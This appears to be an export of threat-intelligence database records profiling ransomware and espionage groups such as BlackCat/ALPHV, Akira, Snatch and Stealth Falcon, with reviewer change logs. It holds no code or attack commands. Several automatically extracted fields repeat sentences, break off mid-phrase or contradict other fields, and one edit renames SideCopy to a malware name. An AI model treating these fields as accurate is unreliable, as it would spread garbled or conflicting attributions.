  "raw_openAI_analysis": "{\"threat_actor\": [\"ShadowSyndicate\"], \"aliases\": [\"Infra Storm\"], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [], \"threat_actor_overview\": [\"ShadowSyndicate is a threat actor that has been linked to multiple ransomware operations. They have been associated with the use of seven different ransomware families in attacks over the past year. The threat actor could be an initial access broker (IAB)\", \" although evidence suggests that ShadowSyndicate is an affiliate to multiple ransomware operations.\", \" although evidence suggests that ShadowSyndicate is an affiliate to multiple ransomware operations. The researchers base their conclusions on a distinct SSH fingerprint they discovered on 85 IP servers\", \" most of them tagged as Cobalt Strike command and control machines.\", \"ShadowSyndicate is a threat actor that has been linked to multiple ransomware operations. They have been associated with the use of seven different ransomware families in attacks over the past year. The group is believed to be an initial access broker (IAB)\", \" but evidence also suggests that they are an affiliate to multiple ransomware operations. The group's activities have been traced back to 85 IP servers\", \" most of which are tagged as Cobalt Strike command and control machines.\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_sophistication\": [], \"threat_actor_type\": [\"unknown\", \"crime-syndicate\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"Group-IB\", \"Bridewell\", \"Michael Koczwara\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-26T21:33:12.517Z"
  },
  "approval_message": "Not enough information",
  "change_log": [
    {
      "_id": {
        "$oid": "6512efa1c12f2c67e0da889b"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-26T14:50:09.433Z"
      },
      "changes": [
        {
          "field": "sources",
          "previous_value": [
            "Group-IB",
            "Bridewell",
            "Michael Koczwara"
          ],
          "updated_value": [
            "Bleeping Computer",
            "Group-IB",
            "Bridewell",
            "Michael Koczwara"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "6512ef4ac12f2c67e0da889a"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-26T14:48:42.603Z"
      },
      "changes": [
        {
          "field": "threat_actor_motives",
          "previous_value": [],
          "updated_value": [
            "Financial Gain"
          ]
        },
        {
          "field": "threat_actor_resources",
          "previous_value": [],
          "updated_value": [
            "organization"
          ]
        },
        {
          "field": "threat_actor_type",
          "previous_value": [
            "unknown",
            "crime-syndicate"
          ],
          "updated_value": [
            "unknown"
          ]
        }
      ]
    }
  ],
  "threat_actor": "ShadowSyndicate"
},
{
  "_id": {
    "$oid": "6512f03b7fbbd0c5aedf3728"
  },
  "report": {
    "$oid": "6512efdfc12f2c67e0da889c"
  },
  "threat_actor_overview": "BlackCat/ALPHV is a ransomware operation that emerged in November 2021. It is suspected to be a rebrand of DarkSide/BlackMatter. The group has been recognized as one of the most sophisticated and high-profile ransomware outfits that targets enterprises on a global scale,  continuously adapting and refining its tactics.",
  "aliases": [
    "DarkSide",
    "BlackMatter"
  ],
  "sources": [
    "Sophos X-Ops",
    "IBM-Xforce",
    "Microsoft",
    "FBI"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Disruption of Service",
    "Financial Theft"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "hacker",
    "crime-syndicate"
  ],
  "threat_actor_sophistication": "expert",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--10dcbd59-e10f-4b19-b770-f29e9e345819",
    "x-industry-sector--8429dce2-eea2-45a3-802b-3fde264fbaef",
    "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
    "x-industry-sector--ef2d23ce-63f5-4f4e-b0fa-d09a5d743cc8",
    "x-industry-sector--f3f4f4e2-1810-4df2-a7ac-a65c9388ed23"
  ],
  "attack_mitigations": "",
  "attack_consequences": "The ransomware operation has resulted in the encryption of systems and remote Azure cloud storage,  with the ransomware operators successfully encrypting 39 Azure Storage accounts.,  appending the .zk09cvt extension to all locked files. They have also claimed an attack on MGM Resorts,  encrypting over 100 ESXi hypervisors.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"BlackCat/ALPHV\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"The ransomware operation has resulted in the encryption of systems and remote Azure cloud storage,  with the ransomware operators successfully encrypting 39 Azure Storage accounts., The ransomware operation has successfully encrypted 39 Azure Storage accounts,  appending the .zk09cvt extension to all locked files. They have also claimed an attack on MGM Resorts,  encrypting over 100 ESXi hypervisors.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"BlackCat/ALPHV is a ransomware operation that emerged in November 2021. It is suspected to be a rebrand of DarkSide/BlackMatter. The group has been recognized as one of the most sophisticated and high-profile ransomware outfits that targets enterprises on a global scale,  continuously adapting and refining its tactics.\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Disruption of Service\", \"Financial Theft\"], \"target_industry_sectors\": [\"technology\", \"hospitality-leisure\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"crime-syndicate\"], \"aliases\": [\"DarkSide\", \"BlackMatter\"], \"vulnerabilities\": [], \"sources\": [\"Sophos X-Ops\", \"IBM-Xforce\", \"Microsoft\", \"FBI\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"BlackCat/ALPHV\"], \"aliases\": [\"DarkSide\", \"BlackMatter\"], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [], \"threat_actor_overview\": [\"BlackCat/ALPHV is a ransomware operation that emerged in November 2021. It is suspected to be a rebrand of DarkSide/BlackMatter. The group has been recognized as one of the most sophisticated and high-profile ransomware outfits that targets enterprises on a global scale\", \" continuously adapting and refining its tactics.\"], \"target_populations\": [], \"target_industry_sectors\": [\"technology\", \"hospitality-leisure\"], \"threat_actor_intent\": [\"Information Theft\", \"Disruption of Service\", \"Financial Theft\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"crime-syndicate\"], \"attack_mitigations\": [], \"attack_consequences\": [\"The ransomware operation has resulted in the encryption of systems and remote Azure cloud storage\", \" with the ransomware operators successfully encrypting 39 Azure Storage accounts.\", \"The ransomware operation has successfully encrypted 39 Azure Storage accounts\", \" appending the .zk09cvt extension to all locked files. They have also claimed an attack on MGM Resorts\", \" encrypting over 100 ESXi hypervisors.\"], \"vulnerabilities\": [], \"sources\": [\"Sophos X-Ops\", \"IBM-Xforce\", \"Microsoft\", \"FBI\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-26T21:56:10.072Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "6512f3d5c12f2c67e0da88a0"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-26T15:08:05.633Z"
      },
      "changes": [
        {
          "field": "attack_consequences",
          "previous_value": "The ransomware operation has resulted in the encryption of systems and remote Azure cloud storage,  with the ransomware operators successfully encrypting 39 Azure Storage accounts., The ransomware operation has successfully encrypted 39 Azure Storage accounts,  appending the .zk09cvt extension to all locked files. They have also claimed an attack on MGM Resorts,  encrypting over 100 ESXi hypervisors.",
          "updated_value": "The ransomware operation has resulted in the encryption of systems and remote Azure cloud storage,  with the ransomware operators successfully encrypting 39 Azure Storage accounts.,  appending the .zk09cvt extension to all locked files. They have also claimed an attack on MGM Resorts,  encrypting over 100 ESXi hypervisors."
        }
      ]
    },
    {
      "_id": {
        "$oid": "6512f20cc12f2c67e0da889e"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-26T15:00:28.635Z"
      },
      "changes": [
        {
          "field": "target_industry_sectors",
          "previous_value": [
            {
              "id": "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
              "name": "technology",
              "description": null,
              "created": "2023-08-24 13:57:04.439000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--10dcbd59-e10f-4b19-b770-f29e9e345819",
              "name": "hospitality-leisure",
              "description": null,
              "created": "2023-08-24 13:57:04.408000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ],
          "updated_value": [
            {
              "id": "x-industry-sector--ef2d23ce-63f5-4f4e-b0fa-d09a5d743cc8",
              "name": "utilities",
              "description": null,
              "created": "2023-08-24 13:57:04.589000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--f3f4f4e2-1810-4df2-a7ac-a65c9388ed23",
              "name": "infrastructure",
              "description": null,
              "created": "2023-08-24 13:57:04.410000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--8429dce2-eea2-45a3-802b-3fde264fbaef",
              "name": "commercial",
              "description": null,
              "created": "2023-08-24 13:57:04.364000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
              "name": "technology",
              "description": null,
              "created": "2023-08-24 13:57:04.439000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--10dcbd59-e10f-4b19-b770-f29e9e345819",
              "name": "hospitality-leisure",
              "description": null,
              "created": "2023-08-24 13:57:04.408000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "6512f141c12f2c67e0da889d"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-26T14:57:05.754Z"
      },
      "changes": [
        {
          "field": "threat_actor_type",
          "previous_value": [
            "crime-syndicate"
          ],
          "updated_value": [
            "hacker",
            "crime-syndicate"
          ]
        },
        {
          "field": "threat_actor_sophistication",
          "previous_value": "none",
          "updated_value": "expert"
        }
      ]
    }
  ],
  "threat_actor": "BlackCat/ALPHV"
},
{
  "_id": {
    "$oid": "6512f3f07fbbd0c5aedf3729"
  },
  "report": {
    "$oid": "6512f386c12f2c67e0da889f"
  },
  "threat_actor_overview": "SideCopy is a Pakistani-linked threat group that has been active since 2019,  primarily targeting South Asian countries,  with a focus on India and Afghanistan. The group's name comes from its use of an infection chain that mimics that of SideWinder APT,  an Indian-linked threat group. Some reports suggest that SideCopy may be a subdivision of Transparent Tribe (APT36),  with similar tactics and techniques observed.",
  "aliases": [
    "APT36",
    "Transparent Tribe"
  ],
  "sources": [
    "S2 Research Team",
    "QiAnXin"
  ],
  "country_of_origin": "PK",
  "threat_actor_motives": [
    "Espionage"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Espionage"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "government"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "IN",
    "AF"
  ],
  "target_regions": [
    "southern-asia"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--95c98046-4589-4c5f-976a-99089bb77b37",
    "x-industry-sector--0c895333-cced-4b2a-bd60-de0e8f0f2ba8"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"SideCopy\", \"country_of_origin\": \"PK\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"SideCopy is a Pakistani-linked threat group that has been active since 2019,  primarily targeting South Asian countries,  with a focus on India and Afghanistan. The group's name comes from its use of an infection chain that mimics that of SideWinder APT,  an Indian-linked threat group. Some reports suggest that SideCopy may be a subdivision of Transparent Tribe (APT36),  with similar tactics and techniques observed.\", \"target_countries\": [\"IN\", \"AF\"], \"target_regions\": [\"southern-asia\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Espionage\"], \"target_industry_sectors\": [\"government-national\", \"defense\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Espionage\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"APT36\", \"Transparent Tribe\"], \"vulnerabilities\": [], \"sources\": [\"S2 Research Team\", \"QiAnXin\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"SideCopy\"], \"aliases\": [\"APT36\", \"Transparent Tribe\"], \"country_of_origin\": [\"PK\"], \"target_countries\": [\"IN\", \"AF\"], \"target_regions\": [\"southern-asia\"], \"threat_actor_overview\": [\"SideCopy is a Pakistani-linked threat group that has been active since 2019\", \" primarily targeting South Asian countries\", \" with a focus on India and Afghanistan. The group's name comes from its use of an infection chain that mimics that of SideWinder APT\", \" an Indian-linked threat group. Some reports suggest that SideCopy may be a subdivision of Transparent Tribe (APT36)\", \" with similar tactics and techniques observed.\"], \"target_populations\": [], \"target_industry_sectors\": [\"government-national\", \"defense\"], \"threat_actor_intent\": [\"Information Theft\", \"Espionage\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Espionage\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"S2 Research Team\", \"QiAnXin\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-27T20:48:49.925Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "6512f502c12f2c67e0da88a2"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-09-26T15:13:06.494Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "SideCopy",
          "updated_value": "AllaKore"
        }
      ]
    }
  ],
  "threat_actor": "AllaKore"
},
{
  "_id": {
    "$oid": "6512f47b7fbbd0c5aedf372a"
  },
  "report": {
    "$oid": "6512f426c12f2c67e0da88a1"
  },
  "threat_actor_overview": "Stealth Falcon is a UAE state-sponsored group known for its sophisticated cyber-espionage attacks. It uses a custom backdoor,  dubbed 'Deadglyph',  which employs anti-detection mechanisms and receives its functions dynamically from a command-and-control server. The group has been known to target political activists,  dissidents,  and journalists in the Middle East.",
  "aliases": [
    "Fruity Armor",
    "Project Raven"
  ],
  "sources": [
    "Dark Reading",
    "ESET"
  ],
  "country_of_origin": "AE",
  "threat_actor_motives": [
    "Espionage"
  ],
  "threat_actor_intent": [
    "Espionage",
    "Information Theft"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "government"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "QA",
    "AE"
  ],
  "target_regions": [
    "middle-east"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Stealth Falcon\", \"country_of_origin\": \"AE\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Stealth Falcon is a UAE state-sponsored group known for its sophisticated cyber-espionage attacks. It uses a custom backdoor,  dubbed 'Deadglyph',  which employs anti-detection mechanisms and receives its functions dynamically from a command-and-control server. The group has been known to target political activists,  dissidents,  and journalists in the Middle East.\", \"target_countries\": [\"QA\", \"AE\"], \"target_regions\": [\"middle-east\"], \"target_populations\": [], \"threat_actor_intent\": [\"Espionage\", \"Information Theft\"], \"target_industry_sectors\": [\"government-public-services\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Espionage\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"Fruity Armor\", \"Project Raven\"], \"vulnerabilities\": [], \"sources\": [\"Dark Reading\", \"ESET\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Stealth Falcon\"], \"aliases\": [\"Fruity Armor\", \"Project Raven\"], \"country_of_origin\": [\"AE\"], \"target_countries\": [\"QA\", \"AE\"], \"target_regions\": [\"middle-east\"], \"threat_actor_overview\": [\"Stealth Falcon is a UAE state-sponsored group known for its sophisticated cyber-espionage attacks. It uses a custom backdoor\", \" dubbed 'Deadglyph'\", \" which employs anti-detection mechanisms and receives its functions dynamically from a command-and-control server. The group has been known to target political activists\", \" dissidents\", \" and journalists in the Middle East.\"], \"target_populations\": [], \"target_industry_sectors\": [\"government-public-services\"], \"threat_actor_intent\": [\"Espionage\", \"Information Theft\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Espionage\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"Dark Reading\", \"ESET\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-26T22:00:08.018Z"
  },
  "approval_message": "",
  "change_log": [],
  "threat_actor": "Stealth Falcon"
},
{
  "_id": {
    "$oid": "6512f58e7fbbd0c5aedf372b"
  },
  "report": {
    "$oid": "6512f519c12f2c67e0da88a3"
  },
  "threat_actor_overview": "Akira ransomware has continued to evolve since emerging as a threat in March,  expanding its reach from initially targeting Windows systems to include Linux servers and employing a growing array of tactics,  techniques,  and procedures (TTPs). The ransomware campaign involves multiple malware samples that carry out various steps,  including shadow copy deletion,  file search,  enumeration,  and encryption,  when executed. Akira uses a double-extortion method by stealing personal data,  encrypting it,  and then extorting money from the victims. If they refuse to pay,  the group then threatens to release the data on the Dark Web.",
  "aliases": [],
  "sources": [
    "Dark Reading",
    "LogPoint",
    "GuidePoint Security's GRI report"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [],
  "threat_actor_type": [
    "criminal",
    "crime-syndicate"
  ],
  "threat_actor_sophistication": "expert",
  "target_countries": [
    "US",
    "UK"
  ],
  "target_regions": [
    "americas",
    "europe"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--0a91ae59-b7de-418c-a719-580725830bb0",
    "x-industry-sector--1dd8ed24-7655-4f0d-80ef-35c36a5b0593",
    "x-industry-sector--532c8286-2c6e-4ad3-8ffd-6d2d49f1b757",
    "x-industry-sector--8429dce2-eea2-45a3-802b-3fde264fbaef"
  ],
  "attack_mitigations": "Implement MFA and limit permissions to prevent brute-forcing of credentials, Keep software and systems updated, Audit privileged accounts and regular security awareness training, Network segmentation to isolate critical systems and sensitive data, Block unauthorized tunneling and remote access tools",
  "attack_consequences": "Data theft, Data encryption, Financial loss",
  "vulnerabilities": [
    "CVE-2023-20269"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"Akira\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Implement MFA and limit permissions to prevent brute-forcing of credentials, Keep software and systems updated, Audit privileged accounts and regular security awareness training, Network segmentation to isolate critical systems and sensitive data, Block unauthorized tunneling and remote access tools\", \"attack_consequences\": \"Data theft, Data encryption, Financial loss\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Akira ransomware has continued to evolve since emerging as a threat in March,  expanding its reach from initially targeting Windows systems to include Linux servers and employing a growing array of tactics,  techniques,  and procedures (TTPs). The ransomware campaign involves multiple malware samples that carry out various steps,  including shadow copy deletion,  file search,  enumeration,  and encryption,  when executed. Akira uses a double-extortion method by stealing personal data,  encrypting it,  and then extorting money from the victims. If they refuse to pay,  the group then threatens to release the data on the Dark Web.\", \"target_countries\": [\"US\", \"UK\"], \"target_regions\": [\"americas\", \"europe\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"target_industry_sectors\": [\"manufacturing\", \"automotive\", \"education\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [], \"threat_actor_type\": [\"criminal\", \"crime-syndicate\"], \"aliases\": [], \"vulnerabilities\": [\"CVE-2023-20269\"], \"sources\": [\"LogPoint\", \"GuidePoint Security's GRI report\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Akira\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [\"US\", \"UK\"], \"target_regions\": [\"americas\", \"europe\"], \"threat_actor_overview\": [\"Akira ransomware has continued to evolve since emerging as a threat in March\", \" expanding its reach from initially targeting Windows systems to include Linux servers and employing a growing array of tactics\", \" techniques\", \" and procedures (TTPs). The ransomware campaign involves multiple malware samples that carry out various steps\", \" including shadow copy deletion\", \" file search\", \" enumeration\", \" and encryption\", \" when executed. Akira uses a double-extortion method by stealing personal data\", \" encrypting it\", \" and then extorting money from the victims. If they refuse to pay\", \" the group then threatens to release the data on the Dark Web.\"], \"target_populations\": [], \"target_industry_sectors\": [\"manufacturing\", \"professional-services\", \"automotive\", \"education\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"criminal\", \"crime-syndicate\"], \"attack_mitigations\": [\"Implement MFA and limit permissions to prevent brute-forcing of credentials\", \"Keep software and systems updated\", \"Audit privileged accounts and regular security awareness training\", \"Network segmentation to isolate critical systems and sensitive data\", \"Block unauthorized tunneling and remote access tools\"], \"attack_consequences\": [\"Data theft\", \"Data encryption\", \"Financial loss\"], \"vulnerabilities\": [\"CVE-2023-20269\"], \"sources\": [\"LogPoint\", \"GuidePoint Security's GRI report\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-26T22:01:27.667Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "6512f6abc12f2c67e0da88a6"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-26T15:20:11.687Z"
      },
      "changes": [
        {
          "field": "sources",
          "previous_value": [
            "LogPoint",
            "GuidePoint Security's GRI report"
          ],
          "updated_value": [
            "Dark Reading",
            "LogPoint",
            "GuidePoint Security's GRI report"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "6512f677c12f2c67e0da88a5"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-26T15:19:19.025Z"
      },
      "changes": [
        {
          "field": "target_industry_sectors",
          "previous_value": [
            {
              "id": "x-industry-sector--1dd8ed24-7655-4f0d-80ef-35c36a5b0593",
              "name": "manufacturing",
              "description": null,
              "created": "2023-08-24 13:57:04.425000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--532c8286-2c6e-4ad3-8ffd-6d2d49f1b757",
              "name": "education",
              "description": null,
              "created": "2023-08-24 13:57:04.377000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--0a91ae59-b7de-418c-a719-580725830bb0",
              "name": "automotive",
              "description": null,
              "created": "2023-08-24 13:57:04.358000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ],
          "updated_value": [
            {
              "id": "x-industry-sector--8429dce2-eea2-45a3-802b-3fde264fbaef",
              "name": "commercial",
              "description": null,
              "created": "2023-08-24 13:57:04.364000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--1dd8ed24-7655-4f0d-80ef-35c36a5b0593",
              "name": "manufacturing",
              "description": null,
              "created": "2023-08-24 13:57:04.425000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--532c8286-2c6e-4ad3-8ffd-6d2d49f1b757",
              "name": "education",
              "description": null,
              "created": "2023-08-24 13:57:04.377000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--0a91ae59-b7de-418c-a719-580725830bb0",
              "name": "automotive",
              "description": null,
              "created": "2023-08-24 13:57:04.358000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "6512f62bc12f2c67e0da88a4"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-26T15:18:03.138Z"
      },
      "changes": [
        {
          "field": "threat_actor_sophistication",
          "previous_value": "none",
          "updated_value": "expert"
        }
      ]
    }
  ],
  "threat_actor": "Akira"
},
{
  "_id": {
    "$oid": "6512f7a87fbbd0c5aedf372c"
  },
  "report": {
    "$oid": "6512f6dac12f2c67e0da88a7"
  },
  "threat_actor_overview": "First appearing in 2018,  Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Snatch threat actors have targeted a wide range of critical infrastructure sectors and conduct ransomware operations involving data exfiltration and double extortion.,  Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB),  Food and Agriculture,  and Information Technology sectors., Snatch threat actors are known for their ransomware attacks. They use various techniques such as gathering victim's network information,  acquiring infrastructure from VPS service providers,  using compromised user credentials,  exploiting weaknesses in RDP,  and using batch files during ransomware execution and data discovery. They also modify Windows Registry keys to aid in persistence and execution and use brute force to obtain administrator credentials for a victim’s network., Snatch threat actors are known for their ransomware attacks. They use various techniques such as gathering information about the victim's networks,  renting Virtual Private Servers (VPSs),  and using batch files during ransomware execution and data discovery. They also modify Windows Registry keys,  disable system’s antivirus program,  and delete all volume shadow copies from a victim’s filesystem to inhibit system recovery.,  and using batch files during ransomware execution and data discovery. They also modify Windows Registry keys to aid in persistence and execution",
  "aliases": [
    "Team Truniger"
  ],
  "sources": [
    "Federal Bureau of Investigation (FBI)",
    "Cybersecurity and Infrastructure Security Agency (CISA)"
  ],
  "country_of_origin": "RU",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft"
  ],
  "threat_actor_capabilities": [
    "T1562.009",
    "T1133",
    "T1110.001",
    "T1078",
    "T1078.002",
    "T1071.001",
    "T1583.003",
    "T1590",
    "T1021.001",
    "T1005",
    "TA0010",
    "T1486",
    "T1562.001",
    "T1036",
    "T1012",
    "T1112",
    "T1569.002",
    "T1057",
    "T1059.003",
    "T1490",
    "T1070.004"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "crime-syndicate"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--db5f2096-51fa-4a2f-b380-6029b5ddcf5e",
    "x-industry-sector--0c895333-cced-4b2a-bd60-de0e8f0f2ba8",
    "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6"
  ],
  "attack_mitigations": "Secure and closely monitor Remote Desktop Protocol (RDP), Maintain offline backups of data, Enable and enforce phishing-resistant multifactor authentication (MFA), The FBI and CISA recommend organizations implement the mitigations to improve their cybersecurity posture. These include auditing remote access tools,  reviewing logs for execution of remote access software,  using security software to detect instances of remote access software being loaded only in memory,  and requiring authorized remote access solutions to be used only from within your network over approved remote access solutions,  such as VPNs or VDIs., Auditing remote access tools,  requiring authorized remote access solutions to be used only from within your network over approved remote access solutions,  such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).,  and requiring authorized remote access solutions to be used only from within the network over approved remote access solutions.",
  "attack_consequences": "Data exfiltration, Double extortion, Disruption of service,  data encryption,  and inhibition of system recovery.,  inhibition of system recovery.",
  "vulnerabilities": [],
